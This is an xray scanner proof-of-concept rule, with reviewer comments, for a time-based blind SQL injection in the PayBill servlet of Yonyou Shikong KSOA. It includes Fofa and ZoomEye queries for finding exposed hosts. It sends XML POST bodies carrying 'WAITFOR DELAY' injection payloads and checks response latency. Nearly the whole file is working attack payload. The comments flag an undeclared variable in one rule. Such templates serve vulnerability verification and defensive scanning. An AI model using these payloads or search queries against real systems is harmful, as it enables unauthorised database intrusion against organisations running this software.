漏洞描述
Fofa: app="用友-时空KSOA"
ZoomEye: app:"用友时空KSOA"
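# xray v2 rule: time-based (blind) SQL injection check against the PayBill servlet.
# r0 sends a baseline request; r1-r3 send the same request with a WAITFOR DELAY
# payload and assert on response latency. The page had lost all indentation,
# which turns `info`/`rules` into null keys and makes `request`/`method`/`path`
# duplicate top-level keys; the structure below is restored from the key order.
id: yonyou-ksoa-paybill-sqi
info:
  name: 用友时空 KSOA PayBill SQL 注入漏洞
  author: Observer
  severity: high
  verified: false
  description: |-
    Fofa: app="用友-时空KSOA"
    ZoomEye: app:"用友时空KSOA"
  reference:
    - https://mp.weixin.qq.com/s/F26g6YiEAB6tgKQsyAo_5w?poc_token=HKvcc2WjQN-i34WdMTGNfKvE2ncprboLkp4DGWg3
  tags: yonyou,ksoa,sqli
  created: 2023/12/06
set:
  # random marker echoed back by the servlet; used to confirm the response is the
  # real calculation output rather than an error page
  r1: randomInt(600000, 900000)
rules:
  # baseline: plain request, no delay
  r0:
    request:
      method: POST
      path: /servlet/PayBill?caculate&_rnd=
      body: |
        <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1</name><name>1</name><name>{{r1}}</name></root>
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1)))
    output:
      # NOTE(review): t0 is captured but never referenced by r1-r3, which use
      # absolute thresholds; comparing against this baseline would reduce false
      # positives on slow or overloaded hosts - confirm intent
      t0: response.latency
  # 5s delay, expect >= 4.5s latency
  r1:
    request:
      method: POST
      path: /servlet/PayBill?caculate&_rnd=
      body: |
        <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:5';--+</name><name>1</name><name>{{r1}}</name></root>
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 4500
  # 3s delay, expect >= 2.5s latency (second timing to rule out a one-off slow response)
  r2:
    request:
      method: POST
      path: /servlet/PayBill?caculate&_rnd=
      body: |
        <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:3';--+</name><name>1</name><name>{{r1}}</name></root>
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 2500
  # NOTE(review): this body sends {{randstr}}, which is not declared in `set`
  # (randstr is a nuclei-style variable), yet the expression still checks for r1.
  # Either declare the variable and check for it, or keep {{r1}} as in r1 - confirm
  r3:
    request:
      method: POST
      path: /servlet/PayBill?caculate&_rnd=
      body: |
        <?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:5';--+</name><name>1</name><name>{{randstr}}</name></root>
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 4500
# all four rules must hold; r0 alone only proves the endpoint echoes the marker
expression: r0() && r1() && r2() && r3()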